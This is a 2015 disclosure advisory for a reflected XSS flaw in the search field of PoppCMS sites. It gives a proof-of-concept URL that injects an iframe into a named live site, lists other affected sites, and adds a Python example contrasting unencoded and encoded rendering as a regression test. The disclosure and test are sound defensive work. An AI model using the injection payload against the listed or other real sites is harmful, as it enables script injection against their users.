0. Timeline
0.0 Discovery: 2015.08.25
0.1.1 Sent First Report: 2015.08.25
0.1.2 Ack from vendor: 2015.08.28
0.2 Disclosure: 2015.10.05

1. Background
PoppCMS is a closed-source HTML content creation/management solution from Estonia[0].

2. Problem
Sites created with PoppCMS have an XSS[1] vulnerability in the search field.

3. Proof of Concept (PoC) Code
http://www.byroomaailm.ee/otsing?searchword=%22/%3E%3Ciframe%20src=http://upload.wikimedia.org/wikipedia/commons/thumb/6/68/Lynx_lynx_poing.jpg/240px-Lynx_lynx_poing.jpg%3E%3C/iframe%3E opens byroomaailm.ee with a picture of a lynx inside an iframe loaded from wikimedia.org.
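
The following is an added example, not PoppCMS code and not part of the original report: it decodes the searchword value from the PoC URL above, renders it through a hypothetical search-page template with and without HTML attribute encoding, and parses the result to show which tags a browser would see. The template markup and the names render, Collector and audit are assumptions; PoppCMS is closed source and its real template is not known.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# PoC URL from section 3 of the advisory.
POC_URL = (
    "http://www.byroomaailm.ee/otsing?searchword=%22/%3E%3Ciframe%20src="
    "http://upload.wikimedia.org/wikipedia/commons/thumb/6/68/"
    "Lynx_lynx_poing.jpg/240px-Lynx_lynx_poing.jpg%3E%3C/iframe%3E"
)

def search_term(url):
    """Return the URL-decoded value of the searchword parameter."""
    return parse_qs(urlsplit(url).query)["searchword"][0]

def render(term, encode):
    """Hypothetical search-page template (assumption, not PoppCMS code).

    encode=False echoes the term as-is; encode=True applies HTML attribute
    encoding, which also escapes the double quote the PoC relies on.
    """
    value = escape(term, quote=True) if encode else term
    return '<form><input name="searchword" value="' + value + '"/></form>'

class Collector(HTMLParser):
    """Records start tags and the value attribute of the search input."""
    def __init__(self):
        super().__init__()
        self.tags, self.input_value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and self.input_value is None:
            self.input_value = dict(attrs).get("value")

def audit(markup, allowed=("form", "input")):
    """Return (tags outside the template's own set, parsed input value)."""
    c = Collector()
    c.feed(markup)
    c.close()
    return [t for t in c.tags if t not in allowed], c.input_value

if __name__ == "__main__":
    term = search_term(POC_URL)
    print("unencoded:", audit(render(term, encode=False)))
    print("encoded:  ", audit(render(term, encode=True)))
```

With encoding applied, the whole search term stays inside the value attribute as data, so the same check can serve as a regression test for the fix.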

4. Not an Exhaustive List of Affected Sites
betoneks.ee, estsporthorse.ee, koduspaa.ee

5. References
[0] www.poppworks.ee redirects to http://www.websystems.ee/
[1] https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

APPENDIX - IMAGES
[Images not reproduced: estsporthorse.ee, koduspaa.ee]